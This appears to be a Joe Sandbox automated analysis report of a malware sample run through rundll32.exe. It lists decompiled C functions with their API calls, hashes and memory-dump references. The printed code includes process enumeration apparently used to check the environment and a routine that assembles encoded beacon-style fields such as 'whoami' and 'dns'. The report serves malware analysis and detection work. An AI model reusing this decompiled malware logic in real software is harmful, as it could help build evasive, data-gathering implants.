                                                  • Opcode ID: 6bbbdd1686ba54009f497856b71fece64f981c10b4e2082b1db52320d68a4d5e
                                                  • Instruction ID: 41f936aeb332fa1569ac40a52d12faf018d4650fcb95ecbb9c5e501ad459625c
                                                  • Opcode Fuzzy Hash: 6bbbdd1686ba54009f497856b71fece64f981c10b4e2082b1db52320d68a4d5e
                                                  • Instruction Fuzzy Hash: 4901A73221421AA7C7127AA5AC8CAEFBB69EF85256F084021F50655140EB798A45C7B1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 052D757F, Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 68%
                                                  			E052D757F() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x52dd27c; // 0x202a5a8
						_t2 = _t9 + 0x52dee54; // 0x73617661
						_push( &_v264);
						if( *0x52dd0fc() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}









                                                  0x052d758a
                                                  0x052d7594
                                                  0x052d7598
                                                  0x052d75a2
                                                  0x052d75d3
                                                  0x052d75a9
                                                  0x052d75ae
                                                  0x052d75bb
                                                  0x052d75c4
                                                  0x052d75db
                                                  0x052d75c6
                                                  0x052d75ce
                                                  0x00000000
                                                  0x052d75ce
                                                  0x052d75dc
                                                  0x052d75dd
                                                  0x00000000
                                                  0x052d75dd
                                                  0x00000000
                                                  0x052d75d7
                                                  0x052d75e3
                                                  0x052d75e8

                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 052D758F
                                                  • Process32First.KERNEL32(00000000,?), ref: 052D75A2
                                                  • Process32Next.KERNEL32(00000000,?), ref: 052D75CE
                                                  • CloseHandle.KERNEL32(00000000), ref: 052D75DD
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                  • String ID:
                                                  • API String ID: 420147892-0
                                                  • Opcode ID: 31fe2f4b3d4519bf38c417eba35ac8ea56e525d896eb1f9924cdd1ece33a58be
                                                  • Instruction ID: c985789979ff4ed9f845de9828da025c966264be19876c9c995f37194decaed2
                                                  • Opcode Fuzzy Hash: 31fe2f4b3d4519bf38c417eba35ac8ea56e525d896eb1f9924cdd1ece33a58be
                                                  • Instruction Fuzzy Hash: 93F0BB716251296BDB20A6769C4DFFBB7ADDFC5351F040061FD0AD2040EF68D9498AF2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 052D7C61, Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E052D7C61(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}






                                                  0x052d7c6b
                                                  0x052d7c6f
                                                  0x052d7c84
                                                  0x052d7c88
                                                  0x052d7c8b
                                                  0x052d7c91
                                                  0x052d7c95
                                                  0x052d7c98
                                                  0x052d7ca3
                                                  0x052d7c9a
                                                  0x052d7c9a
                                                  0x052d7c9a
                                                  0x052d7c98
                                                  0x052d7cb1

                                                  APIs
                                                  • memset.NTDLL ref: 052D7C6F
                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,751881D0), ref: 052D7C84
                                                  • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 052D7C91
                                                  • CloseHandle.KERNEL32(?), ref: 052D7CA3
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: CreateEvent$CloseHandlememset
                                                  • String ID:
                                                  • API String ID: 2812548120-0
                                                  • Opcode ID: 402c4d76e567e6352132f12bd2c1369f54cb8ef67d0ad77a41f3d4b07d3d8f17
                                                  • Instruction ID: 8e4eb656d1fef8089565c98bf6859aa766dafa637c675c4ab61919a253fa2ea4
                                                  • Opcode Fuzzy Hash: 402c4d76e567e6352132f12bd2c1369f54cb8ef67d0ad77a41f3d4b07d3d8f17
                                                  • Instruction Fuzzy Hash: 27F05EB552930DBFE3105F22DCC5C2BFBACFF851D9B15892DF04691141DA36A8098AB0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 052D970F, Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E052D970F() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x52dd26c; // 0x31c
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x52dd2b8; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x52dd26c; // 0x31c
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x52dd238; // 0x6f10000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                                                  0x052d970f
                                                  0x052d9716
                                                  0x052d9760
                                                  0x052d9762
                                                  0x052d9762
                                                  0x052d971a
                                                  0x052d9720
                                                  0x052d9725
                                                  0x052d9729
                                                  0x052d972f
                                                  0x052d9736
                                                  0x00000000
                                                  0x00000000
                                                  0x052d9738
                                                  0x052d973d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x052d973d
                                                  0x052d973f
                                                  0x052d9747
                                                  0x052d974a
                                                  0x052d974a
                                                  0x052d9750
                                                  0x052d9757
                                                  0x052d975a
                                                  0x052d975a
                                                  0x00000000

                                                  APIs
                                                  • SetEvent.KERNEL32(0000031C,00000001,052D8099), ref: 052D971A
                                                  • SleepEx.KERNEL32(00000064,00000001), ref: 052D9729
                                                  • CloseHandle.KERNEL32(0000031C), ref: 052D974A
                                                  • HeapDestroy.KERNEL32(06F10000), ref: 052D975A
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: CloseDestroyEventHandleHeapSleep
                                                  • String ID:
                                                  • API String ID: 4109453060-0
                                                  • Opcode ID: 05c80442af6500b43496740be928cff0798c4ccaee227330b74d4dc716cce6ba
                                                  • Instruction ID: 78e38cab776e133dcdad3ce6c142c2e5db1a41ee66e9e1ca7ccd973060ca62a2
                                                  • Opcode Fuzzy Hash: 05c80442af6500b43496740be928cff0798c4ccaee227330b74d4dc716cce6ba
                                                  • Instruction Fuzzy Hash: 4EF01275F3A71557E7506F75B94DB067F98BF006717050610B819E72C4DE24D880D970
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 052D75E9, Relevance: 6.0, APIs: 4, Instructions: 29sleepmemoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 50%
                                                  			E052D75E9(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0x52dd32c; // 0x73095b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x52dd32c; // 0x73095b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0x52dd030) {
					HeapFree( *0x52dd238, 0, _t8);
				}
				_t14[1] = E052D94A9(_v0, _t14);
				_t11 =  *0x52dd32c; // 0x73095b0
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}










                                                  0x052d75e9
                                                  0x052d75e9
                                                  0x052d75f2
                                                  0x052d7602
                                                  0x052d7602
                                                  0x052d7607
                                                  0x052d760c
                                                  0x00000000
                                                  0x00000000
                                                  0x052d75fc
                                                  0x052d75fc
                                                  0x052d760e
                                                  0x052d7612
                                                  0x052d7624
                                                  0x052d7624
                                                  0x052d7634
                                                  0x052d7637
                                                  0x052d763c
                                                  0x052d7640
                                                  0x052d7646

                                                  APIs
                                                  • RtlEnterCriticalSection.NTDLL(07309570), ref: 052D75F2
                                                  • Sleep.KERNEL32(0000000A,?,052D23DE), ref: 052D75FC
                                                  • HeapFree.KERNEL32(00000000,00000000,?,052D23DE), ref: 052D7624
                                                  • RtlLeaveCriticalSection.NTDLL(07309570), ref: 052D7640
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                  • String ID:
                                                  • API String ID: 58946197-0
                                                  • Opcode ID: c8253ae6f292d683034c0a3ad5a7e6bb53a4fe70d7e817930bf907cfdada0817
                                                  • Instruction ID: 4e3b22b49c4e9e0d93bbb557549c361aa92c79eea610e543858571d856d169be
                                                  • Opcode Fuzzy Hash: c8253ae6f292d683034c0a3ad5a7e6bb53a4fe70d7e817930bf907cfdada0817
                                                  • Instruction Fuzzy Hash: A3F03A70A26541DBD7149B6CE84EF15BFA4EF14352B04C005F846D62C1EA74DC00CE35
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 052DA5D6, Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 37%
                                                  			E052DA5D6() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x52dd32c; // 0x73095b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x52dd32c; // 0x73095b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x52dd32c; // 0x73095b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x52de836) {
					HeapFree( *0x52dd238, 0, _t10);
					_t7 =  *0x52dd32c; // 0x73095b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                                                  0x052da5d6
                                                  0x052da5df
                                                  0x052da5ef
                                                  0x052da5ef
                                                  0x052da5f4
                                                  0x052da5f9
                                                  0x00000000
                                                  0x00000000
                                                  0x052da5e9
                                                  0x052da5e9
                                                  0x052da5fb
                                                  0x052da600
                                                  0x052da604
                                                  0x052da617
                                                  0x052da61d
                                                  0x052da61d
                                                  0x052da626
                                                  0x052da628
                                                  0x052da62c
                                                  0x052da632

                                                  APIs
                                                  • RtlEnterCriticalSection.NTDLL(07309570), ref: 052DA5DF
                                                  • Sleep.KERNEL32(0000000A,?,052D23DE), ref: 052DA5E9
                                                  • HeapFree.KERNEL32(00000000,?,?,052D23DE), ref: 052DA617
                                                  • RtlLeaveCriticalSection.NTDLL(07309570), ref: 052DA62C
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                  • String ID:
                                                  • API String ID: 58946197-0
                                                  • Opcode ID: b92206d6a840f0eddfda54b057f2040cbc888840093dde114bbc2ea2dc1ae02c
                                                  • Instruction ID: 2bb7a8154729ad12937acb9f2d26ec632106acc8658ae900de4db15609249400
                                                  • Opcode Fuzzy Hash: b92206d6a840f0eddfda54b057f2040cbc888840093dde114bbc2ea2dc1ae02c
                                                  • Instruction Fuzzy Hash: EEF0B774E26541DBEB189F68E89EF25BFA5AF08361B44C009F806DB290CB30EC00CE35
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 052D7F27, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 58%
                                                  			E052D7F27(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E052D2049(_t2);
				if(_t34 != 0) {
					_t30 = E052D2049(_t28);
					if(_t30 == 0) {
						E052D9039(_t34);
					} else {
						_t39 = _a4;
						_t22 = E052DA911(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E052DA911(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                                                  0x052d7f27
                                                  0x052d7f31
                                                  0x052d7f33
                                                  0x052d7f39
                                                  0x052d7f39
                                                  0x052d7f42
                                                  0x052d7f46
                                                  0x052d7f52
                                                  0x052d7f56
                                                  0x052d7fca
                                                  0x052d7f58
                                                  0x052d7f58
                                                  0x052d7f5c
                                                  0x052d7f63
                                                  0x052d7f66
                                                  0x052d7f80
                                                  0x052d7f6f
                                                  0x052d7f6f
                                                  0x052d7f73
                                                  0x052d7f76
                                                  0x052d7f7b
                                                  0x052d7f7b
                                                  0x052d7f85
                                                  0x052d7fad
                                                  0x052d7fb3
                                                  0x052d7fb6
                                                  0x052d7f87
                                                  0x052d7f89
                                                  0x052d7f91
                                                  0x052d7f9c
                                                  0x052d7fa1
                                                  0x052d7fa1
                                                  0x052d7fbd
                                                  0x052d7fc4
                                                  0x052d7fc5
                                                  0x052d7fc5
                                                  0x052d7f56
                                                  0x052d7fd5

                                                  APIs
                                                  • lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,052D15A4,?,?,?,?,00000102,052D11DA,?,?,00000000), ref: 052D7F33
                                                    • Part of subcall function 052D2049: RtlAllocateHeap.NTDLL(00000000,00000000,052D7E50), ref: 052D2055
                                                    • Part of subcall function 052DA911: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,052D7F61,00000000,00000001,00000001,?,?,052D15A4,?,?,?,?,00000102), ref: 052DA91F
                                                    • Part of subcall function 052DA911: StrChrA.SHLWAPI(?,0000003F,?,?,052D15A4,?,?,?,?,00000102,052D11DA,?,?,00000000,00000000), ref: 052DA929
                                                  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,052D15A4,?,?,?,?,00000102,052D11DA,?), ref: 052D7F91
                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 052D7FA1
                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 052D7FAD
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                  • String ID:
                                                  • API String ID: 3767559652-0
                                                  • Opcode ID: 1eda429cd267e183bb6f9c03c959941f3f2c708e304774407b2dd8c85652db58
                                                  • Instruction ID: 5bc9529eb963174e4203f4706260bf9690f972b383f9862d36f99b32063da1d8
                                                  • Opcode Fuzzy Hash: 1eda429cd267e183bb6f9c03c959941f3f2c708e304774407b2dd8c85652db58
                                                  • Instruction Fuzzy Hash: C221D272528216EFCB229FA5D888BAEFFE9EF05290F198055F8059B201D779C901C7B0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 052D7CB8, Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E052D7CB8(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E052D2049(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                                                  0x052d7ccd
                                                  0x052d7cd1
                                                  0x052d7cdb
                                                  0x052d7ce2
                                                  0x052d7ce5
                                                  0x052d7ce7
                                                  0x052d7cef
                                                  0x052d7cf4
                                                  0x052d7d02
                                                  0x052d7d07
                                                  0x052d7d11

                                                  APIs
                                                  • lstrlenW.KERNEL32(004F0053,75145520,?,00000008,0730937C,?,052D747C,004F0053,0730937C,?,?,?,?,?,?,052D6814), ref: 052D7CC8
                                                  • lstrlenW.KERNEL32(052D747C,?,052D747C,004F0053,0730937C,?,?,?,?,?,?,052D6814), ref: 052D7CCF
                                                    • Part of subcall function 052D2049: RtlAllocateHeap.NTDLL(00000000,00000000,052D7E50), ref: 052D2055
                                                  • memcpy.NTDLL(00000000,004F0053,751469A0,?,?,052D747C,004F0053,0730937C,?,?,?,?,?,?,052D6814), ref: 052D7CEF
                                                  • memcpy.NTDLL(751469A0,052D747C,00000002,00000000,004F0053,751469A0,?,?,052D747C,004F0053,0730937C), ref: 052D7D02
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: lstrlenmemcpy$AllocateHeap
                                                  • String ID:
                                                  • API String ID: 2411391700-0
                                                  • Opcode ID: 41717053c9b781fae494f4e25d95ac6ef656d2f64ba92b775dd2f134e8c892ce
                                                  • Instruction ID: ba08173cb40bf25c17e6566b1ef48368590125a88d23d3008bb7c8a37d769519
                                                  • Opcode Fuzzy Hash: 41717053c9b781fae494f4e25d95ac6ef656d2f64ba92b775dd2f134e8c892ce
                                                  • Instruction Fuzzy Hash: B3F03C76A10118BB8B11EFA8CC49CDEBBACEE08294B154062A908E7111E671EA14CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 052D3CC8, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrlen.KERNEL32(073087FA,00000000,00000000,74ECC740,052DA453,00000000), ref: 052D3CD8
                                                  • lstrlen.KERNEL32(?), ref: 052D3CE0
                                                    • Part of subcall function 052D2049: RtlAllocateHeap.NTDLL(00000000,00000000,052D7E50), ref: 052D2055
                                                  • lstrcpy.KERNEL32(00000000,073087FA), ref: 052D3CF4
                                                  • lstrcat.KERNEL32(00000000,?), ref: 052D3CFF
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                  • String ID:
                                                  • API String ID: 74227042-0
                                                  • Opcode ID: da66a753958be934052b323325c4a8ad58ba6bb6ea2f1a974860e9e6660f9c47
                                                  • Instruction ID: a590aa753d35bb517d8dd3d8914ffabde86cc79aa1099ff453a26fa3c5c62b2b
                                                  • Opcode Fuzzy Hash: da66a753958be934052b323325c4a8ad58ba6bb6ea2f1a974860e9e6660f9c47
                                                  • Instruction Fuzzy Hash: 63E06D33916221A787119AE5AC4CC6BBFADEE996227044416F600A3110DB248C01CBF1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Analysis Process: rundll32.exe PID: 5852 Parent PID: 1132 rundll32.exeCOMMON

                                                  Executed Functions

                                                  Function 046BADE5, Relevance: 1.5, Strings: 1, Instructions: 209COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $
                                                  • API String ID: 0-3993045852
                                                  • Opcode ID: fa1bf68d99e4750cea49ed326495732c6756d5db4c93bd9b07b4150935eea351
                                                  • Instruction ID: 9a5d81e1464d0325e4b7ba2a57dd6e3fce6f78f2b1160469d7e890072274994b
                                                  • Opcode Fuzzy Hash: fa1bf68d99e4750cea49ed326495732c6756d5db4c93bd9b07b4150935eea351
                                                  • Instruction Fuzzy Hash: 498129B1A00605AFDB20CF98D884AEEB7F9EF58310F148129E945E7340F774EA85CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 046B8B94, Relevance: .2, Instructions: 245COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 24%
                                                  			E046B8B94(void* __eax, void* __ecx, void* __edx, intOrPtr _a4, unsigned int _a8, unsigned int* _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _v24;
				intOrPtr _v28;
				void* __ebx;
				void* __edi;
				void* _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				intOrPtr _t68;
				void* _t71;
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr _t75;
				intOrPtr _t80;
				intOrPtr _t84;
				intOrPtr* _t86;
				intOrPtr _t92;
				intOrPtr _t99;
				unsigned int _t103;
				signed int _t107;
				intOrPtr* _t108;
				intOrPtr* _t110;
				intOrPtr* _t112;
				intOrPtr* _t114;
				intOrPtr _t116;
				intOrPtr _t121;
				void* _t125;
				intOrPtr _t127;
				intOrPtr* _t128;
				void* _t129;
				void* _t138;
				void* _t139;
				void* _t140;
				intOrPtr _t141;
				intOrPtr _t143;
				void* _t144;
				intOrPtr* _t146;
				void* _t147;
				intOrPtr* _t148;
				intOrPtr* _t149;
				intOrPtr* _t152;
				void* _t153;
				void* _t155;

				_t138 = __edx;
				_t129 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					__imp__();
				}
				_t60 =  *0x46bd018; // 0xf56cfa1f
				asm("bswap eax");
				_t61 =  *0x46bd014; // 0x3a87c8cd
				_t127 = _a16;
				_t146 =  *0x46bd120; // 0x74ecc740
				asm("bswap eax");
				_t62 =  *0x46bd010; // 0xd8d2f808
				asm("bswap eax");
				_t63 =  *0x46bd00c; // 0x8f8f86c2
				asm("bswap eax");
				_t64 =  *0x46bd27c; // 0x96a5a8
				_t3 = _t64 + 0x46be633; // 0x74666f73
				_t139 =  *_t146(_t127, _t3, 3, 0x3d14b, _t63, _t62, _t61, _t60,  *0x46bd02c,  *0x46bd004, _t59);
				_t68 =  *0x46bd27c; // 0x96a5a8
				_t4 = _t68 + 0x46be673; // 0x74707526
				_t71 =  *_t146(_t139 + _t127, _t4, E046B1C1A());
				_t155 = _t153 + 0x38;
				_t140 = _t139 + _t71; // executed
				_t72 = E046B54BC(_t129); // executed
				_t128 = __imp__; // 0x75145520
				_v8 = _t72;
				if(_t72 != 0) {
					_t121 =  *0x46bd27c; // 0x96a5a8
					_t7 = _t121 + 0x46be8eb; // 0x736e6426
					_t125 =  *_t146(_a16 + _t140, _t7, _t72);
					_t155 = _t155 + 0xc;
					_t140 = _t140 + _t125;
					 *_t128( *0x46bd238, 0, _v8);
				}
				_t73 = E046B7649();
				_v8 = _t73;
				if(_t73 != 0) {
					_t116 =  *0x46bd27c; // 0x96a5a8
					_t11 = _t116 + 0x46be8f3; // 0x6f687726
					 *_t146(_t140 + _a16, _t11, _t73);
					_t155 = _t155 + 0xc;
					 *_t128( *0x46bd238, 0, _v8);
				}
				_t141 =  *0x46bd32c; // 0x50295b0
				_t75 = E046B9395(0x46bd00a, _t141 + 4);
				_t147 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					 *_t128( *0x46bd238, _t147, _a16); // executed
					return _v12;
				} else {
					__imp__( *0x46bd238, 0, 0x800);
					_v8 = _t75;
					if(_t75 == 0) {
						L25:
						 *_t128( *0x46bd238, _t147, _v20);
						goto L26;
					}
					__imp__();
					E046B7A80(_t75);
					_t80 =  *0x46bd32c; // 0x50295b0
					__imp__(_t80 + 0x40);
					asm("lock xadd [eax], ecx");
